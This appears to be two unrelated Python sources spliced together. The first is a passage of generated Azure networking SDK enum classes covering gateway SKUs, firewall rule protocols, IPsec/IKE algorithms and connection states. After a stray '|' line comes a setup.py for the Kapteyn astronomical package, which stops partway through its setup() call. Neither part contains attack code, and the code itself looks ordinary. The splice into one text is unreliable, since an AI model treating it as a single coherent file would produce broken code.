    """Tier of an application gateway.
    """

    # Generated code: member values are the exact strings used by the service.
    STANDARD = "Standard"
    WAF = "WAF"
    STANDARD_V2 = "Standard_v2"
    WAF_V2 = "WAF_v2"
class AssociationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The association type of the child resource to the parent resource.
    """

    # Generated code: member values are the exact strings used by the service.
    ASSOCIATED = "Associated"
    CONTAINS = "Contains"
class AuthenticationMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """VPN client Authentication Method. Possible values are: 'EAPTLS' and 'EAPMSCHAPv2'.
    """

    # Generated code: member values are the exact strings used by the service.
    EAPTLS = "EAPTLS"
    EAPMSCHA_PV2 = "EAPMSCHAPv2"
class AuthorizationUseStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """AuthorizationUseStatus. Possible values are: 'Available' and 'InUse'.
    """

    # Generated code: member values are the exact strings used by the service.
    AVAILABLE = "Available"
    IN_USE = "InUse"
class AzureFirewallApplicationRuleProtocolType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The protocol type of a Application Rule resource.
    """

    # Generated code: member values are the exact strings used by the service.
    HTTP = "Http"
    HTTPS = "Https"
class AzureFirewallNatRCActionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The action type of a NAT rule collection.
    """

    # Generated code: member values are the exact strings used by the service.
    SNAT = "Snat"
    DNAT = "Dnat"
class AzureFirewallNetworkRuleProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The protocol of a Network Rule resource.
    """

    # Generated code: member values are the exact strings used by the service.
    TCP = "TCP"
    UDP = "UDP"
    ANY = "Any"
    ICMP = "ICMP"
class AzureFirewallRCActionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The action type of a rule collection.
    """

    # Generated code: member values are the exact strings used by the service.
    ALLOW = "Allow"
    DENY = "Deny"
class BgpPeerState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The BGP peer state.
    """

    # Generated code: member values are the exact strings used by the service.
    UNKNOWN = "Unknown"
    STOPPED = "Stopped"
    IDLE = "Idle"
    CONNECTING = "Connecting"
    CONNECTED = "Connected"
class CircuitConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Express Route Circuit Connection State. Possible values are: 'Connected' and 'Disconnected'.
    """

    # Generated code: note the docstring omits 'Connecting', which the
    # service nevertheless defines as a member below.
    CONNECTED = "Connected"
    CONNECTING = "Connecting"
    DISCONNECTED = "Disconnected"
class ConnectionMonitorSourceStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Status of connection monitor source.
    """

    # NOTE(review): "Uknown" (sic) is presumably the literal value defined
    # by the service API -- do not "correct" the spelling without checking
    # the wire format, or lookups against live responses will break.
    UKNOWN = "Uknown"
    ACTIVE = "Active"
    INACTIVE = "Inactive"
class ConnectionState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The connection state.
    """

    # Generated code: member values are the exact strings used by the service.
    REACHABLE = "Reachable"
    UNREACHABLE = "Unreachable"
    UNKNOWN = "Unknown"
class ConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The connection status.
    """

    # Generated code: member values are the exact strings used by the service.
    UNKNOWN = "Unknown"
    CONNECTED = "Connected"
    DISCONNECTED = "Disconnected"
    DEGRADED = "Degraded"
class DhGroup(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The DH Groups used in IKE Phase 1 for initial SA.
    """

    # Generated code: member values are the exact strings used by the service.
    NONE = "None"
    DH_GROUP1 = "DHGroup1"
    DH_GROUP2 = "DHGroup2"
    DH_GROUP14 = "DHGroup14"
    DH_GROUP2048 = "DHGroup2048"
    ECP256 = "ECP256"
    ECP384 = "ECP384"
    DH_GROUP24 = "DHGroup24"
class Direction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The direction of the packet represented as a 5-tuple.
    """

    # Generated code: member values are the exact strings used by the service.
    INBOUND = "Inbound"
    OUTBOUND = "Outbound"
class EffectiveRouteSource(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Who created the route. Possible values are: 'Unknown', 'User', 'VirtualNetworkGateway', and
    'Default'.
    """

    # Generated code: member values are the exact strings used by the service.
    UNKNOWN = "Unknown"
    USER = "User"
    VIRTUAL_NETWORK_GATEWAY = "VirtualNetworkGateway"
    DEFAULT = "Default"
class EffectiveRouteState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The value of effective route. Possible values are: 'Active' and 'Invalid'.
    """

    # Generated code: member values are the exact strings used by the service.
    ACTIVE = "Active"
    INVALID = "Invalid"
class EffectiveSecurityRuleProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The network protocol this rule applies to. Possible values are: 'Tcp', 'Udp', and 'All'.
    """

    # Generated code: member values are the exact strings used by the service.
    TCP = "Tcp"
    UDP = "Udp"
    ALL = "All"
class EvaluationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Connectivity analysis evaluation state.
    """

    # Generated code: member values are the exact strings used by the service.
    NOT_STARTED = "NotStarted"
    IN_PROGRESS = "InProgress"
    COMPLETED = "Completed"
class ExpressRouteCircuitPeeringAdvertisedPublicPrefixState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """AdvertisedPublicPrefixState of the Peering resource. Possible values are 'NotConfigured',
    'Configuring', 'Configured', and 'ValidationNeeded'.
    """

    # Generated code: member values are the exact strings used by the service.
    NOT_CONFIGURED = "NotConfigured"
    CONFIGURING = "Configuring"
    CONFIGURED = "Configured"
    VALIDATION_NEEDED = "ValidationNeeded"
class ExpressRouteCircuitPeeringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The state of peering. Possible values are: 'Disabled' and 'Enabled'.
    """

    # Generated code: member values are the exact strings used by the service.
    DISABLED = "Disabled"
    ENABLED = "Enabled"
class ExpressRouteCircuitSkuFamily(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The family of the SKU. Possible values are: 'UnlimitedData' and 'MeteredData'.
    """

    # Generated code: member values are the exact strings used by the service.
    UNLIMITED_DATA = "UnlimitedData"
    METERED_DATA = "MeteredData"
class ExpressRouteCircuitSkuTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The tier of the SKU. Possible values are 'Standard', 'Premium' or 'Basic'.
    """

    # Generated code: member values are the exact strings used by the service.
    STANDARD = "Standard"
    PREMIUM = "Premium"
    BASIC = "Basic"
class ExpressRouteLinkAdminState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Administrative state of the physical port.
    """

    # Generated code: member values are the exact strings used by the service.
    ENABLED = "Enabled"
    DISABLED = "Disabled"
class ExpressRouteLinkConnectorType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Physical fiber port type.
    """

    # Generated code: member values are the exact strings used by the service.
    LC = "LC"
    SC = "SC"
class ExpressRoutePeeringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The state of peering. Possible values are: 'Disabled' and 'Enabled'.
    """

    # Generated code: member values are the exact strings used by the service.
    DISABLED = "Disabled"
    ENABLED = "Enabled"
class ExpressRoutePeeringType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The PeeringType. Possible values are: 'AzurePublicPeering', 'AzurePrivatePeering', and
    'MicrosoftPeering'.
    """

    # Generated code: member values are the exact strings used by the service.
    AZURE_PUBLIC_PEERING = "AzurePublicPeering"
    AZURE_PRIVATE_PEERING = "AzurePrivatePeering"
    MICROSOFT_PEERING = "MicrosoftPeering"
class ExpressRoutePortsEncapsulation(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Encapsulation method on physical ports.
    """

    # Generated code: member values are the exact strings used by the service.
    DOT1_Q = "Dot1Q"
    QIN_Q = "QinQ"
class FlowLogFormatType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The file type of flow log.
    """

    # Generated code: currently the only service-defined format.
    JSON = "JSON"
class HTTPMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """HTTP method.
    """

    # Generated code: currently the only service-defined method.
    GET = "Get"
class HubVirtualNetworkConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The current state of the VirtualHub to vnet connection.
    """

    # Generated code: member values are the exact strings used by the service.
    UNKNOWN = "Unknown"
    CONNECTING = "Connecting"
    CONNECTED = "Connected"
    NOT_CONNECTED = "NotConnected"
class IkeEncryption(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The IKE encryption algorithm (IKE phase 2).
    """

    # Generated code: member values are the exact strings used by the service.
    DES = "DES"
    DES3 = "DES3"
    AES128 = "AES128"
    AES192 = "AES192"
    AES256 = "AES256"
    GCMAES256 = "GCMAES256"
    GCMAES128 = "GCMAES128"
class IkeIntegrity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The IKE integrity algorithm (IKE phase 2).
    """

    # Generated code: member values are the exact strings used by the service.
    MD5 = "MD5"
    SHA1 = "SHA1"
    SHA256 = "SHA256"
    SHA384 = "SHA384"
    GCMAES256 = "GCMAES256"
    GCMAES128 = "GCMAES128"
class IPAllocationMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """PrivateIP allocation method.
    """

    # Generated code: member values are the exact strings used by the service.
    STATIC = "Static"
    DYNAMIC = "Dynamic"
class IpFlowProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Protocol to be verified on.
    """

    TCP = "TCP"
    UDP = "UDP"
class IpsecEncryption(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The IPSec encryption algorithm (IKE phase 1).
    """

    # 'None' disables IPSec encryption entirely.
    NONE = "None"
    DES = "DES"
    DES3 = "DES3"
    AES128 = "AES128"
    AES192 = "AES192"
    AES256 = "AES256"
    GCMAES128 = "GCMAES128"
    GCMAES192 = "GCMAES192"
    GCMAES256 = "GCMAES256"
class IpsecIntegrity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The IPSec integrity algorithm (IKE phase 1).
    """

    MD5 = "MD5"
    SHA1 = "SHA1"
    SHA256 = "SHA256"
    GCMAES128 = "GCMAES128"
    GCMAES192 = "GCMAES192"
    GCMAES256 = "GCMAES256"
class IPVersion(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Available from Api-Version 2016-03-30 onwards, it represents whether the specific
    ipconfiguration is IPv4 or IPv6. Default is taken as IPv4. Possible values are: 'IPv4' and
    'IPv6'.
    """

    # Member names look auto-generated from the wire values 'IPv4'/'IPv6'.
    I_PV4 = "IPv4"
    I_PV6 = "IPv6"
class IssueType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The type of issue.
    """

    UNKNOWN = "Unknown"
    AGENT_STOPPED = "AgentStopped"
    GUEST_FIREWALL = "GuestFirewall"
    DNS_RESOLUTION = "DnsResolution"
    SOCKET_BIND = "SocketBind"
    NETWORK_SECURITY_RULE = "NetworkSecurityRule"
    USER_DEFINED_ROUTE = "UserDefinedRoute"
    PORT_THROTTLED = "PortThrottled"
    PLATFORM = "Platform"
class LoadBalancerSkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Name of a load balancer SKU.
    """

    BASIC = "Basic"
    STANDARD = "Standard"
class LoadDistribution(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The load distribution policy for this rule. Possible values are 'Default', 'SourceIP', and
    'SourceIPProtocol'.
    """

    DEFAULT = "Default"
    SOURCE_IP = "SourceIP"
    SOURCE_IP_PROTOCOL = "SourceIPProtocol"
class NetworkOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Status of the Azure async operation. Possible values are: 'InProgress', 'Succeeded', and
    'Failed'.
    """

    IN_PROGRESS = "InProgress"
    SUCCEEDED = "Succeeded"
    FAILED = "Failed"
class NextHopType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Next hop type.
    """

    INTERNET = "Internet"
    VIRTUAL_APPLIANCE = "VirtualAppliance"
    VIRTUAL_NETWORK_GATEWAY = "VirtualNetworkGateway"
    VNET_LOCAL = "VnetLocal"
    HYPER_NET_GATEWAY = "HyperNetGateway"
    NONE = "None"
class OfficeTrafficCategory(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The office traffic category.
    """

    OPTIMIZE = "Optimize"
    OPTIMIZE_AND_ALLOW = "OptimizeAndAllow"
    ALL = "All"
    NONE = "None"
class Origin(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The origin of the issue.
    """

    LOCAL = "Local"
    INBOUND = "Inbound"
    OUTBOUND = "Outbound"
class OutboundRulePropertiesFormatProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Protocol - TCP, UDP or All
    """

    # Note mixed-case wire values ('Tcp'/'Udp'), unlike IpFlowProtocol's upper-case ones.
    TCP = "Tcp"
    UDP = "Udp"
    ALL = "All"
class PcError(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Error states of a packet capture session (see PcStatus/PcProtocol).
    """

    INTERNAL_ERROR = "InternalError"
    AGENT_STOPPED = "AgentStopped"
    CAPTURE_FAILED = "CaptureFailed"
    LOCAL_FILE_FAILED = "LocalFileFailed"
    STORAGE_FAILED = "StorageFailed"
class PcProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Protocol to be filtered on.
    """

    TCP = "TCP"
    UDP = "UDP"
    ANY = "Any"
class PcStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The status of the packet capture session.
    """

    NOT_STARTED = "NotStarted"
    RUNNING = "Running"
    STOPPED = "Stopped"
    ERROR = "Error"
    UNKNOWN = "Unknown"
class PfsGroup(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The Pfs Groups used in IKE Phase 2 for new child SA.
    """

    # 'None' disables Perfect Forward Secrecy.
    NONE = "None"
    PFS1 = "PFS1"
    PFS2 = "PFS2"
    PFS2048 = "PFS2048"
    ECP256 = "ECP256"
    ECP384 = "ECP384"
    PFS24 = "PFS24"
    PFS14 = "PFS14"
    PFSMM = "PFSMM"
class ProbeProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The protocol of the end point. Possible values are: 'Http', 'Tcp', or 'Https'. If 'Tcp' is
    specified, a received ACK is required for the probe to be successful. If 'Http' or 'Https' is
    specified, a 200 OK response from the specifies URI is required for the probe to be successful.
    """

    HTTP = "Http"
    TCP = "Tcp"
    HTTPS = "Https"
class ProcessorArchitecture(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """VPN client Processor Architecture. Possible values are: 'AMD64' and 'X86'.
    """

    # Wire value is 'Amd64' despite the docstring's 'AMD64'; lookups are
    # case-insensitive per the metaclass name, so both resolve.
    AMD64 = "Amd64"
    X86 = "X86"
class Protocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Network protocol.
    """

    TCP = "Tcp"
    HTTP = "Http"
    HTTPS = "Https"
    ICMP = "Icmp"
class ProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The current provisioning state.
    """

    SUCCEEDED = "Succeeded"
    UPDATING = "Updating"
    DELETING = "Deleting"
    FAILED = "Failed"
class PublicIPAddressSkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Name of a public IP address SKU.
    """

    BASIC = "Basic"
    STANDARD = "Standard"
class PublicIPPrefixSkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Name of a public IP prefix SKU.
    """

    # Prefixes only come in the Standard SKU in this API version.
    STANDARD = "Standard"
class ResourceIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The type of identity used for the resource. The type 'SystemAssigned, UserAssigned' includes
    both an implicitly created identity and a set of user assigned identities. The type 'None' will
    remove any identities from the virtual machine.
    """

    SYSTEM_ASSIGNED = "SystemAssigned"
    USER_ASSIGNED = "UserAssigned"
    # Combined value: note the embedded comma+space is part of the wire string.
    SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
    NONE = "None"
class RouteFilterRuleType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The rule type of the rule. Valid value is: 'Community'
    """

    COMMUNITY = "Community"
class RouteNextHopType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The type of Azure hop the packet should be sent to. Possible values are:
    'VirtualNetworkGateway', 'VnetLocal', 'Internet', 'VirtualAppliance', and 'None'.
    """

    VIRTUAL_NETWORK_GATEWAY = "VirtualNetworkGateway"
    VNET_LOCAL = "VnetLocal"
    INTERNET = "Internet"
    VIRTUAL_APPLIANCE = "VirtualAppliance"
    NONE = "None"
class SecurityRuleAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Whether network traffic is allowed or denied. Possible values are: 'Allow' and 'Deny'.
    """

    ALLOW = "Allow"
    DENY = "Deny"
class SecurityRuleDirection(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The direction of the rule. Possible values are: 'Inbound' and 'Outbound'.
    """

    INBOUND = "Inbound"
    OUTBOUND = "Outbound"
class SecurityRuleProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Network protocol this rule applies to. Possible values are 'Tcp', 'Udp', and '*'.
    """

    TCP = "Tcp"
    UDP = "Udp"
    # '*' is the service's wildcard meaning "any protocol".
    ASTERISK = "*"
class ServiceProviderProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The ServiceProviderProvisioningState state of the resource. Possible values are
    'NotProvisioned', 'Provisioning', 'Provisioned', and 'Deprovisioning'.
    """

    NOT_PROVISIONED = "NotProvisioned"
    PROVISIONING = "Provisioning"
    PROVISIONED = "Provisioned"
    DEPROVISIONING = "Deprovisioning"
class Severity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The severity of the issue.
    """

    ERROR = "Error"
    WARNING = "Warning"
class TransportProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The transport protocol for the endpoint. Possible values are 'Udp' or 'Tcp' or 'All'.
    """

    UDP = "Udp"
    TCP = "Tcp"
    ALL = "All"
class TunnelConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The current state of the tunnel.
    """

    UNKNOWN = "Unknown"
    CONNECTING = "Connecting"
    CONNECTED = "Connected"
    NOT_CONNECTED = "NotConnected"
class UsageUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """An enum describing the unit of measurement.
    """

    # Network usages are reported as plain counts only.
    COUNT = "Count"
class VerbosityLevel(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Verbosity level. Accepted values are 'Normal', 'Minimum', 'Full'.
    """

    NORMAL = "Normal"
    MINIMUM = "Minimum"
    FULL = "Full"
class VirtualNetworkGatewayConnectionProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Gateway connection protocol. Possible values are: 'IKEv2', 'IKEv1'.
    """

    # Member names look auto-generated from the wire values 'IKEv2'/'IKEv1'.
    IK_EV2 = "IKEv2"
    IK_EV1 = "IKEv1"
class VirtualNetworkGatewayConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Virtual network Gateway connection status.
    """

    UNKNOWN = "Unknown"
    CONNECTING = "Connecting"
    CONNECTED = "Connected"
    NOT_CONNECTED = "NotConnected"
class VirtualNetworkGatewayConnectionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Gateway connection type. Possible values are: 'IPsec', 'Vnet2Vnet', 'ExpressRoute', and
    'VPNClient'.
    """

    I_PSEC = "IPsec"
    VNET2_VNET = "Vnet2Vnet"
    EXPRESS_ROUTE = "ExpressRoute"
    VPN_CLIENT = "VPNClient"
class VirtualNetworkGatewaySkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Gateway SKU name.
    """

    # NOTE: mirrors VirtualNetworkGatewaySkuTier member-for-member.
    BASIC = "Basic"
    HIGH_PERFORMANCE = "HighPerformance"
    STANDARD = "Standard"
    ULTRA_PERFORMANCE = "UltraPerformance"
    VPN_GW1 = "VpnGw1"
    VPN_GW2 = "VpnGw2"
    VPN_GW3 = "VpnGw3"
    VPN_GW1_AZ = "VpnGw1AZ"
    VPN_GW2_AZ = "VpnGw2AZ"
    VPN_GW3_AZ = "VpnGw3AZ"
    ER_GW1_AZ = "ErGw1AZ"
    ER_GW2_AZ = "ErGw2AZ"
    ER_GW3_AZ = "ErGw3AZ"
class VirtualNetworkGatewaySkuTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Gateway SKU tier.
    """

    # NOTE: mirrors VirtualNetworkGatewaySkuName member-for-member.
    BASIC = "Basic"
    HIGH_PERFORMANCE = "HighPerformance"
    STANDARD = "Standard"
    ULTRA_PERFORMANCE = "UltraPerformance"
    VPN_GW1 = "VpnGw1"
    VPN_GW2 = "VpnGw2"
    VPN_GW3 = "VpnGw3"
    VPN_GW1_AZ = "VpnGw1AZ"
    VPN_GW2_AZ = "VpnGw2AZ"
    VPN_GW3_AZ = "VpnGw3AZ"
    ER_GW1_AZ = "ErGw1AZ"
    ER_GW2_AZ = "ErGw2AZ"
    ER_GW3_AZ = "ErGw3AZ"
class VirtualNetworkGatewayType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The type of this virtual network gateway. Possible values are: 'Vpn' and 'ExpressRoute'.
    """

    VPN = "Vpn"
    EXPRESS_ROUTE = "ExpressRoute"
class VirtualNetworkPeeringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The status of the virtual network peering. Possible values are 'Initiated', 'Connected', and
    'Disconnected'.
    """

    INITIATED = "Initiated"
    CONNECTED = "Connected"
    DISCONNECTED = "Disconnected"
class VirtualWanSecurityProviderType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The virtual wan security provider type.
    """

    EXTERNAL = "External"
    NATIVE = "Native"
class VpnClientProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """VPN client protocol enabled for the virtual network gateway.
    """

    IKE_V2 = "IkeV2"
    SSTP = "SSTP"
    OPEN_VPN = "OpenVPN"
class VpnConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The current state of the vpn connection.
    """

    UNKNOWN = "Unknown"
    CONNECTING = "Connecting"
    CONNECTED = "Connected"
    NOT_CONNECTED = "NotConnected"
class VpnGatewayTunnelingProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """VPN protocol enabled for the P2SVpnServerConfiguration.
    """

    # Same wire values as VpnClientProtocol, minus SSTP.
    IKE_V2 = "IkeV2"
    OPEN_VPN = "OpenVPN"
class VpnType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The type of this virtual network gateway. Possible values are: 'PolicyBased' and 'RouteBased'.
    """

    POLICY_BASED = "PolicyBased"
    ROUTE_BASED = "RouteBased"
|
|
from setuptools import setup, Extension
import sys
sys.path.insert(0, ".")
from kapteyn import __version__ as version
from glob import glob
import sys, os
# from https://github.com/msabramo/cython-test/
# get cython before running setup(..)
#from setuptools.dist import Distribution
#Distribution(dict(setup_requires='Cython'))
# Verify build prerequisites before calling setup().
#
# FIX: both handlers previously used a bare ``except:``, which also swallows
# SystemExit/KeyboardInterrupt and any unrelated error, masking the real
# cause.  Catch only the exception each probe can actually raise.
try:
    import numpy
except ImportError:
    print('''
-- Error.
The Kapteyn Package requires NumPy, which seems to be unavailable here.
Please check your Python installation.
''')
    sys.exit(1)

try:
    # The WCSLIB sources ship inside src/; glob() returns [] when the tree
    # is missing, so indexing [0] raises IndexError.
    wcslib_dir = glob('src/wcslib*/C/')[0]
except IndexError:
    print('''
-- Error.
Unable to find WCSLIB source distribution.
''')
    sys.exit(1)

# C header search path: numpy's headers, our own src/, and the WCSLIB tree.
include_dirs = []
numdir = os.path.dirname(numpy.__file__)
ipath = os.path.join(numdir, numpy.get_include())
include_dirs.append(ipath)
include_dirs.append('src')
include_dirs.append(wcslib_dir)
# Package metadata passed to setup() below.
short_descr = "Kapteyn Package: Python modules for astronomical applications"

# Long description shown on PyPI.
description = """The Kapteyn Package is a collection of Python modules
and applications developed by the computer group of the Kapteyn
Astronomical Institute, University of Groningen, The Netherlands. The
purpose of the package is to provide tools for the development of
astronomical applications with Python.
The package is suitable for both inexperienced and experienced users and
developers and documentation is provided for both groups. The
documentation also provides in-depth chapters about celestial
transformations, spectral translations and non-linear least squares fitting.
The package's most important features:
* The handling of spatial and spectral coordinates, WCS projections
and transformations between different sky systems. Spectral
translations (e.g., between frequencies and velocities) are supported
and also mixed coordinates. (Modules wcs and celestial, Module wcs
uses Mark Calabretta's WCSLIB which is distributed with the package.)
* Versatile tools for writing small and dedicated applications for
the inspection of FITS headers, the extraction and display of (FITS)
data, interactive inspection of this data (color editing) and for the
creation of plots with world coordinate information. (Module maputils)
As one example, a gallery of all-sky plots is provided.
* A class for the efficient reading, writing and manipulating simple
table-like structures in text files. (Module tabarray)
* Utilities for use with matplotlib such as obtaining coordinate
information from plots, interactively modifiable colormaps and timer
events (module mplutil); tools for parsing and interpreting coordinate
information entered by the user (module positions).
* A function to search for gaussian components in a profile (module
profiles) and a class for non-linear least squares curve fitting
(module kmpfit)"""

classifiers = [
    # Beta releases carry a 'b' in the version string and get the
    # "4 - Beta" trove classifier; stable releases get "5 - Production/Stable".
    ['Development Status :: 5 - Production/Stable',
     'Development Status :: 4 - Beta'][int('b' in version)],
    'Programming Language :: Python',
    'Programming Language :: Cython',
    'Programming Language :: C',
    'Intended Audience :: Science/Research',
    'Topic :: Scientific/Engineering :: Astronomy',
    'Topic :: Scientific/Engineering :: Visualization',
    'Topic :: Scientific/Engineering :: Mathematics',
    'License :: OSI Approved :: BSD License',
    'License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)',
    'Operating System :: POSIX :: Linux',
    'Operating System :: MacOS :: MacOS X',
    'Operating System :: Microsoft :: Windows'
]

download_url = "http://www.astro.rug.nl/software/kapteyn/kapteyn-%s.tar.gz" % version
# Cython/C sources for the 'wcs' extension (our own wrapper code).
wcsmod_src = [
    "eterms.c",
    "wcs.pyx",
    "xyz.c"
]

# Bundled WCSLIB C sources, relative to the unpacked wcslib_dir tree.
wcslib_src = [
    "cel.c",
    "lin.c",
    "log.c",
    "prj.c",
    "spc.c",
    "sph.c",
    "spx.c",
    "tab.c",
    "wcs.c",
    "wcsfix.c",
    "wcshdr.c",
    "wcsprintf.c",
    "wcstrig.c",
    "wcsunits.c",
    "wcsutil.c",
    "wcserr.c",
    "flexed/wcsulex.c",
    "flexed/wcsutrn.c"
]

# scipy.ndimage-derived C sources for the '_nd_image' extension.
ndimg_src = [
    "nd_image.c",
    "ni_filters.c",
    "ni_fourier.c",
    "ni_interpolation.c",
    "ni_measure.c",
    "ni_morphology.c",
    "ni_support.c",
]

# Resolve the relative names above against their directories.
wcs_src = ( ['src/' + source for source in wcsmod_src]
            + [wcslib_dir + source for source in wcslib_src] )
_nd_image_src = ['src/ndimg/' + source for source in ndimg_src]
define_macros = []

# MS Windows adjustments
#
if sys.platform == 'win32':
    define_macros.append(('YY_NO_UNISTD_H', None))
    define_macros.append(('_CRT_SECURE_NO_WARNINGS', None))

# avoid using buggy Apple compiler
#
if sys.platform == 'darwin':
    from distutils import ccompiler
    import subprocess
    import re
    c = ccompiler.new_compiler()
    process = subprocess.Popen(c.compiler + ['--version'],
                               stdout=subprocess.PIPE)
    output = process.communicate()[0].strip()
    # FIX: this used to be assigned to ``version``, clobbering the package
    # version imported from kapteyn at the top of the file, so on macOS
    # setup() below was called with the *compiler* version string.  Use a
    # distinct local name.
    compiler_version = output.split()[0].decode("ascii")
    if re.match('i686-apple-darwin[0-9]*-llvm-gcc-4.2', compiler_version):
        os.environ['CC'] = 'clang'
class lazy_cythonize(list):
    """A list stand-in that defers building its contents until first use.

    ``callback`` is invoked at most once, the first time the object is
    iterated, indexed or measured; its return value is cached.  Used so
    that ``cythonize()`` only runs after setup_requires has had a chance
    to install Cython.
    """

    def __init__(self, callback):
        self._list = None
        self.callback = callback

    def c_list(self):
        # Build (and cache) the real list on first demand.
        if self._list is None:
            self._list = self.callback()
        return self._list

    def __iter__(self):
        return iter(self.c_list())

    def __getitem__(self, ii):
        return self.c_list()[ii]

    def __len__(self):
        return len(self.c_list())
def extensions():
    """Build and cythonize the extension-module list.

    Cython is imported here (not at module level) so that setup_requires
    can install it before this function runs via lazy_cythonize.
    """
    from Cython.Build import cythonize

    # (name, sources, pass define_macros?) for each extension module.
    specs = [
        ("wcs", wcs_src, True),
        ("ascarray", ["src/ascarray.pyx"], False),
        ("profiles", ["src/profiles.pyx", "src/gauestd.c"], False),
        ("_nd_image", _nd_image_src, False),
        ("kmpfit", ["src/kmpfit.pyx", "src/mpfit.c"], False),
    ]
    ext_modules = []
    for name, sources, with_macros in specs:
        if with_macros:
            ext = Extension(name, sources,
                            include_dirs=include_dirs,
                            define_macros=define_macros)
        else:
            ext = Extension(name, sources, include_dirs=include_dirs)
        ext_modules.append(ext)
    return cythonize(ext_modules)
# Register the package with setuptools.  (A stray no-op '""""""' expression
# that followed this call has been removed.)
setup(
    name="kapteyn",
    version=version,
    description=short_descr,
    author='J.P. Terlouw, M.G.R. Vogelaar, M.A. Breddels',
    author_email='gipsy@astro.rug.nl',
    url='http://www.astro.rug.nl/software/kapteyn/',
